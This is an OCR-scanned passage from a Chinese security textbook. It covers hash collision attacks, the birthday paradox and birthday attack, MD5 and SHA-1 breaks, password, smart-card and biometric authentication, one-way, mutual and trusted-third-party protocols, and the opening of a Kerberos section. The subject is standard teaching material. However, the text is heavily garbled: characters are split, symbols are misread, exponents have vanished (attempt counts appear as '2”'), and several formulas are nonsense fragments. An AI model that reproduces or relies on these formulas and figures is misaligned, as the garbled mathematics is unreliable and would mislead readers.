M: ) ,使 得 hashCM ) 一 hash(M: ) ,这 种 攻击 其 实 就 是 要 寻找 一 个 弱 碰 撞 。 

(3) 碰撞 攻击 (Collision Attack) : 找到 M, 和 M: ,使 得 hashCM, ) 一 hash(CM: ) ,这 种 攻 
击 其 实 就 是 要 寻找 一 个 强 碰 撞 。 

要 完成 以 上 的 攻击 行为 ,目前 一 般 都 是 靠 穷 举 的 方法 ,因为 那些 没有 通过 分 析 和 差分 攻 
击 考验 的 算法 ,大 多 都 已 经 天 折 在 实验 室 里 了 。 因 此 ,如 果 目 前 流行 的 Hash 算法 能 完全 符 
合 密码 学 意义 上 的 单 向 性 和 无 碰撞 性 ,就 保证 了 只 有 穷 举 , 才 是 破坏 Hash 运算 安全 特性 的 


唯一 方法 。 
为 了 攻击 弱 无 碰撞 性 ,可 能 要 穷 举 个 数 和 散 列 值 空间 长 度 一 样 大 的 输入 , 即 尝试 2” 或 
2 "个 不 同 的 输入 。 


一 种 被 称 为 “生日 攻击 ”的 方法 用 于 寻找 一 个 强 碰撞 ,有 效 地 降低 了 需要 穷 举 的 空间 ,将 
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其 降低 为 大 约 2 或 2" 。 所 以 , 强 无 碰撞 性 是 决定 Hash 算法 安全 性 的 关键 。 下 面 着 重 介绍 
“生日 攻击 ”。 


1. 弱 碰 撞 


“生日 攻击 " 旨 在 寻找 一 个 强 碰撞 , 它 能 够 大 大 减少 攻击 的 计算 代价 。 为 了 突出 显示 这 
一 点 ,我 们 首先 分 析 一 下 寻找 一 个 弱 碰撞 所 需 的 计算 代价 。 

考虑 这 个 问题 : 给 定 一 个 散 列 函数 互 和 某 Hash 值 H(zx) ,假定 互 有 7 个 可 能 的 输出 。 
如 果 互 有 A 个 随机 输入 , 必须 为 多 大 才能 使 至 少 存在 一 个 输入 y ,使 得 电 (y) 王 昌 (z) 的 概 
率 大 于 0.5? 

因为 及 有 种 可 能 的 输出 ,所 以 对 于 某 个 y 值 ,有 H(y) 二 H(z) 的 概率 为 1/n。 那 么 
HH(y) 隆 H(z) 的 概率 为 1 一 1/n。 

那么 随机 地 产生 & 个 随机 的 y 值 , 均 使 电 (y) 隆 H(z) 的 概率 为 (1 一 1/n)*。 

所 以 在 & 个 随机 的 y 值 当中 至 少 有 一 个 使 昌 (y) 二 昌 (z) 的 概率 为 1 一 (1 一 1/n)*。 

根据 二 项 式 定理 


(1—a)=1—ka 


EK) ss EE DRE... 
T 21 a 31 a 本 


当 a 很 小 时 ,(1 一 a)* 宅 1 一 ka, 所 以 对 于 (一 1/n)*, 当 nn 很 大 时 , (1 一 1/n)* 守 1 一 (1 一 
k/n)=k/n, 

现在 要 使 这 个 概率 等 于 0.5, 即 &/n 二 0.5, 所 以 ,k= 二 n/2。 因 此 可 以 得 到 如 下 结论 : 

如 果 Hash 码 为 mw 位 , 则 有 2” 个 可 能 的 Hash 码 。 

如 果 给 定 有 = 矿 (zx) ,要 想 找 到 一 个 y, 使 有 H(y) =h 的 概率 为 0.5, 则 要 进行 多 次 的 尝 
试 ,尝试 的 次 数 大 约 为 k= 二 2"/2 二 2”"!。 

所 以 ,对 于 一 个 使 用 64 位 的 Hash 码 ,攻击 者 要 想 找 到 满足 H(M') 二 HCM) 的 M' 来 赫 
代 M, 即 寻找 一 个 弱 碰撞 ,平均 来 讲 , 他 找到 这 样 的 消息 大 约 要 进行 2” 次 尝试 。 


2. 生日 悖 论 


在 讨论 生日 攻击 的 理论 基础 之 前 ,我们 先 来 分 析 另 一 个 问题 : 在 一 个 教室 中 ,最 少 应 有 
多 少 学 生 ,才能 使 至 少 有 两 人 具有 相同 生日 的 概率 不 小 于 0.5? 

第 一 个 人 的 生日 占 了 一 天 ,因此 第 二 个 人 有 不 同 生日 的 概率 为 364/365 ,第 三 个 人 则 少 
了 两 个 选择 ,因此 他 与 前 两 个 人 生日 都 不 同 的 概率 是 363/365, 依 此 类 推 ,第 个 人 与 前 面 
k 一 1 个 人 生日 都 不 同 的 概率 是 [365 一 (4 一 1)]/365 。 


364 、363 .365—(k—1) 
所 以 ,这 上 个 人 生日 均 不 相同 的 概率 是 365 X365 ~ x 365 ,那么 这 个 人 中 
至 少 有 两 个 相同 的 概率 则 为 
364 、363 Ne 3651 
bl" a (365 — Rk) 1(365)7 


可 以 计算 出 , 当 & 一 23 时 ,p 二 0.5073。 
当 有 一 100 时 ,p 王 0. 999 9997。 
结果 说 明 只 需 23 人 , 即 任 找 23 人 ,从 中 总 能 选 出 两 人 具有 相同 生日 的 概率 至 少 为 0. 5 。 
概率 结果 与 人 的 直觉 是 相 违 背 的 。 这 说 明 某 些 事情 的 发 生 概率 是 比 我 们 的 感觉 要 大 得 
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多 的 。 
3. 生日 攻击 


1) 生日 攻击 的 理论 基础 
给 定 两 个 集合 XX 和 YY, 每 个 集合 有 上 有 个 元 素 : XX: {xi sre TY: (yy yh) 
其 中 ,各 元 素 的 取 值 是 1~n 之 间 的 均匀 分 布 的 随机 值 (kn) ,那么 ,这 两 个 集合 中 至 少 有 一 
对 元 素 (X 中 的 一 个 元 素 和 YY 中 的 一 个 元 素 ) 相 同 的 概率 R(n,k) 是 多 少 呢 ? 
给 定 zi ,那么 v1 一 zi 的 概率 为 1/n, 所 以 yi 关 zi 的 概率 为 1 一 1/n。 那 么 Y 中 的 个 值 
都 不 等 于 zx 的 概率 为 (1 一 1/n)*。 
同 理 , 给 定 zz ,那么 Y 中 的 个 值 都 不 等 于 zx, 的 概率 为 (1 一 1/n)*。 
同 理 ,给 定 xz; ,那么 Y 中 的 & 个 值 都 不 等 于 zx; 的 概率 为 (1 一 1/n)*。 
所 以 ,Y 中 没有 任何 元 素 与 X 中 任何 元 素 相同 的 概率 为 
kN\k A 
ca me de | 
那么 ,Y 中 至 少 有 一 个 元 素 与 X 中 元 素 相同 的 概率 为 
ROnsk) = 1 一 人 -1) 


了 2 


可 以 证 明 , 当 xz 宇 0 时 ,不 等 式 (1 一 +x) 三 e “是 成 立 的 , 且 当 zx 了 0 时 ,1 一 x 之 e "。 
根据 此 不 等 式 有 [1 一 十 ]<e+ ,n>0, 所 以 ,1 一 十】 三 (e+)* ,那么 


= 好 


1¥ a 
R(n,k)=1 上 1] l= w) 1 一 en 


显然 , 当 1 一 e- 人 二 0.5 时 ,RGn,k) 之 0.5。 由 此 可 得 ,4 二 Vln3 二 0. 83Vi, 当 很 大 
时 ,hm 。 所 以 , 当 一 2" 时 ,ksz2"2。 也 就 是 说 ,对 于 一 个 使 用 64 位 的 Hash 码 , 攻 击 者 
要 想 找到 M， 和 M, ,使 得 hash(CM ) 一 hash(M ) ,平均 来 讲 ,他 找到 这 样 的 消息 大 约 要 进行 
22 次 尝试 。 这 一 计算 代价 要 比 寻找 一 个 弱 碰 撞 小 得 多 。 

2) 实施 生日 攻击 

设 通 信 双 方 A 和 B 是 采用 如 图 5-24 所 示 的 公 钥 加 密 Hash 值 的 认证 方式 来 进行 通 
言 的 。 


M M -他 1 
比较 
Kes EralHMD] Ks 


5-24” 公 和 钥 加 密 Hash 值 的 认证 方式 


这 里 , 瓦 是 Hash 算法 ,E 是 公 钥 加 密 算法 ,Kr 是 A 的 私 钥 ,Ku 是 A 的 公 钥 ,D 是 解密 
算法 。 

那么 攻击 者 可 以 采用 下 述 方法 来 实施 生日 攻击 。 假设 M 和 Hash 算法 生成 64 位 的 
Hash 值 。 攻 击 者 可 以 根据 M, 产 生 2” 个 表达 相同 含义 的 变 式 ( 例 如 在 词 与 词 之 间 多 加 一 
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个 空格 ) 。 同 时 准备 好 伪造 的 消息 M ,产生 2” 个 表达 相同 含义 的 变 式 。 在 这 两 个 集合 中 ， 
找 出 产生 相同 Hash 码 的 一 对 消息 M, 和 Mi 。 根 据 前 面 分 析 的 生日 攻击 的 原理 ,找到 这 样 
一 对 消息 的 概率 大 于 0.5。 最 后 ,攻击 者 将 拿 Mi 给 发 送 者 签名 ,但 发 送 时 ,把 Mi 和 经 加 密 
的 Hash 码 一 起 发 送 。 

目前 对 Hash 攻击 的 研究 ,大 多 集中 在 如 何 降低 穷 举 的 空间 大 小 上 。 

2004 年 8 月 17 日 的 美国 加 州 圣 巴巴 拉 的 国际 密码 学 会 议 (Crypto'2004) 上 ,来 自 中 国 
山东 大 学 的 王小云 教授 做 了 破译 MD5、HAVAL-128、MD4 和 RIPEMD 算法 的 报告 ,公布 
了 MD 系列 算法 的 破解 结果 。 宣 告 了 固 若 金汤 的 世界 通行 密码 标准 MD5 的 堡 侄 友 然 倒 
塌 ,引发 了 密码 学 界 的 轩然大波 。 

2005 年 2 月 15 日 ,在 美国 召开 的 国际 信息 安全 RSA 研讨 会 上 ,国际 著名 密码 学 专家 
Adi Shamir 宣布 ,他 收 到 了 来 自 中 国 山东 大 学 王小云 . 尹 依 群 、 于 红 波 等 三 人 的 论文 ,论文 
证 明 SHA-1 在 理论 上 也 被 破解 。 她 证 明了 对 于 160 位 SHA-1, 只 需要 大 约 2” 次 计算 就 能 
找到 一 个 碰撞 ,而 理论 值 是 2” 次 。 


身份 认证 与 数字 签名 


61 身份 认证 


在 现实 的 世界 里 ,要 验证 一 个 人 的 身份 有 许多 种 方法 ,如 根据 长 相 特征 、 看 证 件 . 比 对 指 
纹 或 者 是 特殊 持 有 物 如 古代 将 军 的 虎 符 等 。 但 是 这 些 方法 在 网 络 中 通常 是 行 不 通 的 ,因为 
现在 的 计算 机 还 无 法 做 到 如 同人 类 一 般 的 判断 ,因此 在 网 络 里 必须 借 由 沟通 双方 所 共同 信 
赖 的 验证 程序 来 验证 对 方 身份 ,这 种 方式 称 为 身份 认证 。 

身份 认证 是 验证 主体 的 真实 身份 与 其 所 声称 的 身份 是 否 符合 的 过 程 。 认 证 的 结果 只 有 
两 个 : 符合 和 不 符合 。 适 用 于 用 户 、 进 程 、 系 统 、 信 息 等 。 

例如 我 们 平时 通过 身份 证 来 证 明 自 己 的 身份 .使 用 银行 卡 从 ATM 机 上 取款 、 使 用 密码 
登录 计算 机 等 ,这 些 都 属于 身份 认证 。 

身份 认证 和 消息 认证 相 比 较 , 身 份 认 证 一 般 都 是 实时 的 ,消息 认证 一 般 不 提供 时 间 性 。 
另外 身份 认证 只 证 实 实体 的 身份 ,消息 认证 除了 消息 的 合法 和 完整 外 ,还 需要 知道 消息 的 
你 s 

身份 认证 系统 的 组 成 如 下 : 

(1) 一 方 是 出 示 证 件 的 人 , 称 做 示 证 者 P(prover) ,又 称 声称 者 (claimant) 。 

(2) 另 一 方 为 验证 者 V(verifier) ,检验 声称 者 提出 的 证 件 的 正确 性 和 合法 性 ,决定 是 否 


满足 要 求 。 
(3) 第 三 方 是 可 信赖 者 TP(trusted third party) ,参与 调解 纠纷 。 在 许多 应 用 场合 没有 
第 三 方 。 


6.1.1 身份 认证 的 物理 基础 


用 户 或 系统 主要 能 通过 三 种 方法 来 证 明 他 们 的 身份 。 
1. 用 户 所 知道 的 


在 互联 网 和 计算 机 领域 中 最 常用 的 认证 方法 是 口令 认证 ,也 就 是 “用 户 所 知道 的 "。 口 
令 实际 上 是 通信 双方 预先 约定 的 秘密 数据 。 这 种 方法 简单 易 行 ,不 需要 太 多 投入 就 可 以 实 
现 ,所 以 应 用 广泛 ,在 操作 系统 、 网 络 .数据库 和 应 用 程序 中 都 采用 了 口令 验证 方法 。 但 这 种 
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方法 安全 性 不 够 高 ,因为 口令 有 可 能 被 窃取 、 丢 失 、 复 制 。 如 果 用 户 把 口令 告诉 了 其 他 人 , 则 
计算 机 也 将 给 予 那 个 人 访问 权限 ,这 并 不 是 计算 机 的 失误 ,而 是 用 户 本 身 造 成 的 。 而 且 绝 大 
多 数 用 户 都 没有 足够 的 安全 意识 ,所 选用 的 口令 都 是 所 谓 的 “ 弱 口 令 ”。 例 如 英国 的 在 线 银 
行 Egg 发 现 50% 的 用 户 选 用 家 庭 成 员 的 名 字 作 为 获取 在 线 银行 服务 的 口令 ,其 中 23% 是 
孩子 的 名 字 、19% 是 配偶 或 伙伴 的 名 字 、9% 是 用 户 本 人 的 名 字 。 这 些 口令 都 极 易 破解 。 所 
以 在 实际 应 用 中 ,口令 一 般 并 不 是 以 明文 的 形式 存在 和 使 用 ,而 是 采用 一 些 加 强 的 处 理 之 后 
才 使 用 的 。 

一 种 解决 的 办 法 是 对 口令 加 密 。 口 令 以 密 文 的 形式 存储 和 传输 ,并 且 对 用 户口 令 的 加 
密使 得 从 口令 的 密 文 恢复 出 口令 的 明文 在 计算 上 不 可 行 。 这 就 要 求 对 口令 的 加 密 算法 必须 
是 单 向 的 , 即 只 能 加 密 ,不 能 解密 。 在 验证 用 户 的 口令 时 ,验证 方 用 单 向 函数 加 密 , 并 与 存储 
的 密 文 相 比较 , 若 相等 , 则 确认 用 户 的 身份 有 效 , 否 则 确认 用 户 身份 无 效 。 

为 了 安全 ,口令 应 当 经 常 更 换 。 在 安全 需求 非常 高 的 应 用 中 ,最 好 一 个 口令 只 用 一 次 ， 
这 就 是 “一 次 性 口令 ”。 实 现 一 次 性 口令 的 方式 很 多 .例如 每 次 进行 验证 时 , 先 由 验证 者 产生 
一 个 随机 数 zx, 然后 采用 对 称 密码 体制 将 x 加 密 , 并 传送 给 用 户 , 用 户 用 与 验证 者 共享 的 密 
钥 解密 得 到 zx, 然 后 将 (z 十 1) 加 密 ,传输 给 验证 者 。 验 证 者 接收 后 解密 得 到 (z 十 1), 同 时 验 
证 者 根据 自己 的 zx 计算 (zx 十 1), 将 结果 和 收 到 的 (x 十 1) 进 行 比 较 , 如 果 相 等 则 通过 验证 。 
由 于 每 次 验证 产生 的 随机 数 都 互 不 相等 ,所 以 一 个 口令 就 只 使 用 了 一 次 。 一 次 性 口令 作为 
身份 认证 方法 非常 重要 ,因为 使 用 这 种 口令 ,使 得 中 途 截 获 口令 变 得 毫 无 意义 。 由 于 要 产生 
大 量 的 一 次 性 口令 ,所 以 必须 采用 专用 的 设备 来 产生 口令 。 目 前 有 很 多 种 口令 生成 设备 ,有 
的 类 似 于 便携 式 计算 器 ,有 的 则 就 是 个 USB 接口 的 闪存 。 目 前 国内 的 各 大 银行 的 网 上 银行 
业务 中 对 用 户 身份 进行 识别 时 都 采用 了 一 次 性 口令 技术 。 

对 于 安全 性 较 高 的 系统 ,往往 还 需要 和 其 他 的 认证 方法 共同 使 用 。 例 如 去 银行 取款 , 除 
了 需要 账号 的 取款 密码 以 外 ,还 需要 有 银行 发 的 存折 或 银行 卡 共同 认证 。 采 用 银行 卡 的 方 
法 则 是 下 面 所 说 的 利用 “用 户 所 拥有 的 ”来 进行 认证 。 


2. 用 户 所 拥有 的 


这 种 认证 方式 相对 复杂 、 成 本 也 较 高 ,但 这 种 方法 的 安全 性 也 较 高 , 它 需 要 一 些 物理 原 
件 , 例 如 大 楼 的 通行 卡 , 只 有 在 扫描 器 上 划 卡 通过 验证 的 人 才能 够 进入 大 楼 。 但 是 像 这 样 的 
磁卡 最 大 的 缺点 是 它 只 有 数据 存储 能 力 , 没 有 数据 处 理 能 力 ,没有 对 记录 的 数据 进行 保护 的 
机 制 ,因而 伪造 和 复制 磁卡 比较 容易 。 

随 着 微 处 理 器 的 发 展 ,出 现 了 智能 卡 。 在 计算 机 领域 的 典型 例子 就 是 智能 卡 的 使 用 ,所 
有 的 智能 卡 都 包含 一 块 芯片 ,存储 了 持 卡 人 的 个 人 信息 。 当 需要 某 种 服务 的 时 候 , 持 卡 人 在 
读 卡 设备 上 进行 认证 。 智 能 卡 可 以 说 是 最 小 的 个 人 计算 机 ,在 它 的 芯片 上 包含 有 CPU 、\ 存 
储 器 和 I/O 接口 ,而 且 有 操作 系统 的 软件 支持 ,有 数据 存储 和 计算 能 力 ,因而 安全 保密 性 
更 好 。 

不 过 用 磁卡 或 智能 卡 来 作为 用 户 的 身份 凭证 进行 身份 认证 仍然 有 不 足 之 处 。 如 果 磁 卡 
或 智能 卡 丢 失 ,那么 捡 到 卡 的 人 就 可 以 假冒 真正 的 用 户 。 因 此 需要 一 种 磁卡 和 智能 卡 上 不 
具有 的 身份 信息 ,这 种 身份 信息 通常 采用 个 人 识别 号 (Personal Identification Number， 
PIN) 。 一 般 每 张 卡 的 持 有 者 都 拥有 一 个 个 人 识别 号 PIN。 这 个 PIN 不 能 写 到 卡 上 , 持 卡 人 
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必须 自己 妥善 保存 并 严格 保密 。PIN 可 以 由 金融 机 构 来 产生 并 分 配给 持 卡 人 ,也 可 由 持 卡 
人 选择 并 报 金 融 机 构 核准 。 在 验证 过 程 中 ,验证 者 不 但 要 验证 持 卡 人 的 卡 是 真实 的 卡 , 同 时 
还 要 通过 PIN 来 验证 持 卡 人 的 确 是 他 本 人 。 


3. 用 户 的 特征 


依据 人 类 自身 所 固有 的 生理 或 行为 特征 进行 识别 。 生 理 特征 与 生 俱 来 ,多 为 先天 性 的 ， 
如 指纹 眼睛 虹膜 、 人 脸 .DNA 等 ; 行为 特征 则 是 习惯 使 然 ,多 为 后 天 性 的 ,如 笔迹 、 步 态 等 。 
生物 识别 因此 包括 指纹 识别 .虹膜 识别 、 人 脸 识别 、 掌 纹 识别 .声音 识别 ,签名 识别 笔迹 识 
别 、 手 形 识别 , 步 态 识别 及 多 种 生物 特征 融合 识别 等 诸多 种 类 ,其 中 ,虹膜 和 指纹 识别 被 公认 
为 最 可 靠 的 生物 识别 方式 。 

这 种 认证 利用 了 一 些 不 能 复制 的 个 人 特征 ,如 指纹 、 视 网 膜 .面部 特征 等 。 这 种 方法 也 
被 认为 是 生物 测定 学 。 这 样 的 认证 系统 安全 性 高 ,但 成 本 也 较 高 。 另 外 ,技术 上 的 发 展 也 证 
明 , 这 些 生 物 特征 在 安全 上 也 并 不 是 无 懈 可 击 的 。 例 如 有 研究 者 在 2002 年 发 现 可 以 用 凝 胶 
铸 成 的 指纹 模子 来 螨 骗 指纹 识别 器 。 在 有 些 场 合 ,指纹 识别 也 并 不 适用 ,例如 在 医院 的 计算 
机 系统 应 用 中 ,由 于 医生 ,护士 在 工作 中 要 经 常 洗手 ,他 们 都 不 太 愿意 使 用 指纹 识别 系统 。 

视网膜 的 图 案 的 确 是 独一无二 的 ,用 视网膜 做 认证 也 的 确 十 分 可 靠 ,但 是 由 于 需要 使 用 
聚光灯 来 获取 独特 的 眼球 后 面 的 血管 图 ,并 不 是 每 个 登录 系统 的 人 都 愿意 用 一 个 仪器 来 扫 
描 自己 的 眼睛 ,因为 人 的 肉眼 暴露 在 这 种 视网膜 扫描 装置 下 会 觉得 很 不 舒服 。 所 以 这 样 的 
系统 只 在 一 个 高 安全 环境 中 实施 。 


6.12 身份 认证 方式 


身份 认证 根据 其 实现 方式 的 不 同 可 以 分 为 三 类 , 即 单 向 认证 (one-way authentication) 、 双 
向 认证 (two-way authentication) 和 信任 的 第 三 方 认证 (trusted third-party authentication) 。 每 一 
种 实现 方式 又 可 以 根据 不 同 的 需求 采用 对 称 密码 或 非 对 称 密码 来 实现 。 


1. 单 向 认证 


单 向 认证 是 通信 的 一 方 认证 另 一 方 的 身份 ,比如 服务 器 在 提供 用 户 申请 的 服务 以 前 , 先 
要 认证 用 户 是 否 是 这 项 服务 的 合法 用 户 , 但 是 不 需要 向 用 户 证 明 自 己 的 身份 ,如 图 6-1 
所 示 。 

客户 端 只 需 提供 ID 和 密码 给 服务 器 端 确认 ,服务 器 端 确认 后 就 允许 客户 端的 登录 。 

单 向 认证 可 以 用 对 称 密码 或 非 对 称 密码 体制 来 实现 。 

(1) 用 对 称 密码 体制 来 实现 单 向 认证 的 方法 如 图 6-2 所 示 。 


三 (1) ID,Password DD E(RNK) 
= 
客户 端 。 中 Avthenticated 服务 器 六 @ EARVK) 


图 6-1 单 向 认证 图 6-2 基于 对 称 密码 的 单 向 认证 
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这 里 ,A 需要 单 向 认证 B 的 身份 。A 首先 产生 一 个 随机 数 Rs, 用 双方 共享 的 密 钥 Ks 
对 其 加 密 后 发 送 给 B, 同 时 A 对 Rs 施加 某 函 数 变 换 f ,得 到 了 (Rs), 其 中 是 某 公 开 的 简 
单 函 数 。B 收 到 报 文 之 后 ,用 密 钥 Ks 对 其 收 到 的 报 文 解密 得 到 Rs ,对 其 施加 函数 变换 f， 
再 用 Ks 对 了 (RA) 加密 后 发 送 给 A。A 收 到 报 文 后 用 Ks 解密 ,并 与 其 原先 计算 的 (RA) 比 
较 , 若 两 者 相等 , 则 B 的 身份 通过 了 A 的 认证 。 

(2) 用 非 对 称 密码 体制 来 实现 单 向 认证 的 方法 如 图 6-3 所 示 。 

A 首先 产生 一 个 随机 数 RA ,并 发 给 B。B 收 到 后 用 其 私 钥 Kss 对 Rs 的 加 密 , 然 后 发 送 
给 A。A 用 BB 的 公 钥 解密 ,如 果 得 到 的 结果 等 于 RA, 则 B 的 身份 通过 了 A 的 认证 。 


2. 双向 认证 


双向 认证 需要 通信 双方 互相 认证 对 方 的 身份 。 双 方 都 要 提供 用 户 名 和 密码 给 对 方 , 才 
能 通过 认证 。 这 种 认证 方式 不 同 于 单 向 认证 ,客户 端 还 需要 认证 服务 器 端的 身份 ,这 样 用 户 
还 需要 服务 器 端的 ID 和 密码 ,如 图 6-4 所 示 。 

双向 认证 也 可 以 用 对 称 密码 或 非 对 称 密码 体制 来 实现 。 

(1) 用 对 称 密码 体制 来 实现 双向 认证 的 方法 如 图 6-5 所 示 。 


(1) Client ID,Password 一 


Om (2) Server ID,Password 
SS OT 
= | 
加 ERAKSD) 客户 端 (3) Authenticated 银 务 器 足 


图 6-3 基于 非 对 称 密码 的 单 向 认证 图 6-4 双向 认证 


A 首先 产生 一 个 随机 数 R ,用 双方 共享 的 密 钥 Ks 对 其 加 密 后 发 送 给 B。B 收 到 报 文 
之 后 ,用 密 钥 Ks 对 其 收 到 的 报 文 解密 得 到 Rs。 然 后 B 也 产生 一 个 随机 数 Rs ,并 将 其 连接 
在 收 到 的 Rs 之 后 ,得 到 Rs | Rs,B 用 Ks 对 RA | Rs 加 密 后 发 送 给 A。A 收 到 后 用 Ks 解 
密 得 到 R。 和 Rs ,如 果 收 到 的 RA 和 最 初 A 发 送 给 B 的 Rs 相同, 则 B 的 身份 通过 了 A 的 认 
证 。 最 后 ,A 用 Ks 对 Rs 加 密 后 发 送 给 B,B 收 到 后 用 Ks 解密 得 到 Ra, 如果 这 个 Re 和 最 
初 B 发 送 给 A 的 Rs 相同 , 则 A 的 身份 通过 了 B 的 认证 。 

(2) 用 非 对 称 密码 体制 来 实现 双向 认证 的 方法 如 图 6-6 所 示 。 


CD ERAKS) RA 
CO CR @ ant Ya) 
图 ERe.Ks) ® ERp,Ksn) 
6-5 基于 对 称 密码 的 双向 认证 6-6 ”基于 非 对 称 密码 的 双向 认证 


A 首先 产生 一 个 随机 数 RA ,并 发 给 B。B 收 到 后 也 产生 一 个 随机 数 Ra ,并 将 其 连接 在 
收 到 的 Rs 之 后 ,得 到 Rs | Rs ,用 其 私 钥 Kss 对 RA 上 Rs 加 密 , 然 后 发 送 给 A。A 用 B 的 公 
钥 解密 ,得 到 RA。 和 Rs ,如 果 这 个 RA 和 最 初 A 发 送 给 B 的 Rs 相同 , 则 B 的 身份 通过 了 A 
的 认证 。 最 后 ,A 用 其 私 钥 Ks 对 Rs 加 密 后 发 送 给 B,B 收 到 后 用 A 的 公 钥 解密 得 到 Rs， 
如 果 这 个 Re 和 最 初 B 发 送 给 A 的 Rs 相同 , 则 A 的 身份 通过 了 B 的 认证 。 
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3. 信任 的 第 三 方 认证 


信任 的 第 三 方 (trusted third party) 认 证 也 是 一 种 通信 双方 相互 认证 的 方式 ,但 是 认证 
过 程 必须 借助 于 一 个 双方 都 能 信任 的 第 三 方 ,一 般 而 言 可 以 是 政府 机 构 或 其 他 可 信赖 的 机 
构 。 当 两 端 欲 进行 连 线 时 ,彼此 必须 先 通 过 信任 第 三 方 的 认证 ,然后 才能 互相 交换 密 钥 ,而 
后 进行 通信 ,如 图 6-7 所 示 。 


(5) Authenticate Data 


(6) Authenticate Data 
服务 器 端 


图 6-7 信任 的 第 三 方 认 证 


下 面 介绍 一 种 第 三 方 认证 机 制 , 如 图 6-8 所 示 。 


图 EUDAINPke) 
© ENillNs,Pka) 


加 ENzPkB) 


图 6-8 第 三 方 认证 机 制 


其 中 ,KDC 是 公 钥 分 配 中 心 。 

首先 ,A 发 送 一 条 带 有 时 间 戳 的 消息 给 公 钥 管理 员 , 以 请 求 B 的 当前 公 钥 。 管 理 员 给 
A 发 送 一 条 用 其 私 钥 SKAr 加 密 的 消息 。 这 样 如 果 A 可 以 用 管理 员 的 公 钥 对 接收 到 的 消息 
解密 , 则 可 确信 该 消息 来 自 管理 员 。 消 息 中 的 内 容 包括 : 

(1) B 的 公 钥 Prs。A 可 用 它 对 要 发 送 给 B 的 消息 加 密 。 

(2) 原始 请 求 Request。A 可 用 它 与 其 最 初 发 出 的 请 求 相 比较 ,以 验证 其 原始 请 求 未 被 
修改 。 

(3) 原始 时 间 截 Timel 。A 可 以 确定 它 收 到 的 不 是 来 自 管理 员 的 旧 消 息 。 

然后 ,A 保存 B 的 公 钥 ,并 用 它 对 包含 A 的 标识 IDA 和 临时 交互 号 的 消息 加 密 , 然 后 
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发 给 B, 这 个 临时 交互 号 用 来 唯一 标识 本 次 通信 。 

接着 ,B 采用 同样 的 方法 ,通过 图 中 的 第 由 、 回 两 步 ,从 管理 员 处 得 到 A 的 公 钥 。 然 后 
在 第 @ 步 中 ,B 用 Prs 对 A 的 临时 交互 号 N; 和 B 产 生 的 新 临时 交互 号 Ns 加 密 , 并 发 送 给 
A。 因 为 只 有 B 可 以 解密 消息 @, 所 以 消息 @ 中 的 Ni 可 以 使 A 确信 其 通信 伙伴 就 是 B。 

最 后 ,A 用 B 的 公 钥 对 Ns 加 密 并 发 送 给 B, 以 使 B 相信 其 通信 伙伴 就 是 A。 

由 这 种 借助 于 信任 第 三 方 的 认证 方式 变化 而 来 的 认证 协议 相当 多 ,各 有 各 的 特色 与 优 
缺点 ,其 中 一 个 最 著名 的 例子 就 是 由 美国 麻 省 理工 学 院 提出 的 Kerberos 协议 。 


6.1.3 ”Kerberos 协议 


Kerberos 是 在 20 世纪 80 年 代 中 期 作为 美国 麻 省 理工 学 院 “ 雅 典 娜 计划 ”(Project 
Athena) 的 一 部 分 被 开发 的 。Kerberos 要 被 用 于 其 他 更 广泛 的 环境 时 ,需要 做 一 些 修改 以 
适应 新 的 应 用 策略 和 模式 ,因此 ,从 1989 年 开始 设计 了 新 的 Kerberos 第 5 版 (Kerberos 
v5)。 尽 管 v4 还 在 被 广泛 使 用 ,但 一 般 将 v5 作为 Kerberos 的 标准 协议 。 

原本 Kerberos 广泛 使 用 于 UNIX 系统 上 ,如 Sun 公司 的 网 络 档案 系统 Network File 
System(NFS), 然 而 近年 来 支持 Kerberos 认证 系统 的 厂商 越 来 越 多 , 如 Microsoft 的 
Windows 2000/XP 系统 以 及 Redhat Linux 等 都 支持 Kerberos 认证 协议 。 

Kerberos 协议 使 用 了 强 密码 ,以 使 Client 能 够 通过 不 安全 的 Internet 连接 向 Server 证 
明 他 的 身份 。 在 Client 和 Server 用 Kerberos 证 明了 各 自 的 身份 后 ,还 可 以 对 数据 加 密 从 
而 保证 数据 的 机 密 性 和 完整 性 。Kerberos 是 一 个 分 布 式 的 认证 服务 , 它 允 许 一 个 进程 (或 
客户 ) 代 表 一 个 主体 (或 用 户 ) 向 验证 者 证 明 他 的 身份 ,而 不 需要 通过 网 络 发 送 那 些 有 可 能 会 
被 攻击 者 用 来 假冒 主体 身份 的 数据 。Kerberos 还 提供 了 可 选 的 Client 和 Server 之 间 数 据 
通信 的 完整 性 和 保密 性 。 


1. Kerberos 协议 的 应 用 环境 

Kerberos 协议 的 应 用 环境 为 : 在 一 个 分 布 式 的 Client/Server 体系 机 构 中 采用 一 个 或 
多 个 Kerberos 服务 器 提供 认证 服务 。Client 想 请 求 应 用 
服务 器 Server 上 的 资源 ,首先 Client 向 Kerberos 认证 服 


务 器 请 求 一 张 身份 证 明 ,然后 到 将 身份 证 明 交 给 Server 
进行 验证 ,Server 在 验证 通过 后 , 即 为 Client 分 配 请 求 的 (CCiient 5 一 一 Sever 》 
资源 ,同时 也 向 Client 证 明 自 己 的 身份 ,如 图 6-9 所 示 。 


2. Kerberos 协议 的 基本 架构 


图 6-9 Kerberos 的 基本 应 用 


在 Kerberos 认证 系统 中 总 共有 四 个 角色 : 客户 端 . 服 务 器 .认证 服务 器 (Authentication 
Server,AS) 及 票据 授权 服务 器 (Ticket-Granting Server,TGS) 。Kerberos 认证 系统 中 是 采 
用 DES 作为 它 的 加 密 算 法 ,每 一 个 使 用 者 都 会 有 一 个 自己 的 认证 密 钥 (authentication 
key) ,这 个 认证 密 钥 会 存放 在 认证 服务 器 中 。 而 认证 服务 器 AS 负责 使 用 者 的 身份 确认 及 
维护 使 用 者 和 服务 器 的 资料 ,票据 授权 服务 器 TGS 专门 负责 产生 客户 端 与 服务 器 每 次 通信 
时 所 要 使 用 的 会 话 密 钥 ( 称 为 session key)。 每 次 的 认证 与 会 话 密 钥 都 会 有 一 个 有 效 期 限 。 
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整个 Kerberos 系统 架构 如 图 6-10 所 示 。 


每 个 用 户 仅 
登录 一 次 会 话 


认证 服务 器 -一口 


Kerberos 


@ 提供 服务 器 认证 码 
图 6-10 ”Kerberos 系统 架构 


在 Kerberos 系统 中 , 当 客 户 端 要 和 服务 器 通信 时 ,客户 端 会 先 向 认证 服务 器 AS 请 求 
一 张 与 票据 授权 服务 器 TGS 沟通 所 需要 的 票据 (可 以 把 票据 理解 为 通行 证 ) ,该 票据 中 有 一 
个 客户 端 与 票据 授权 服务 器 进行 通信 的 会 话 密 钥 Ke ,还 包含 了 客户 端 和 服务 器 的 标识 、 
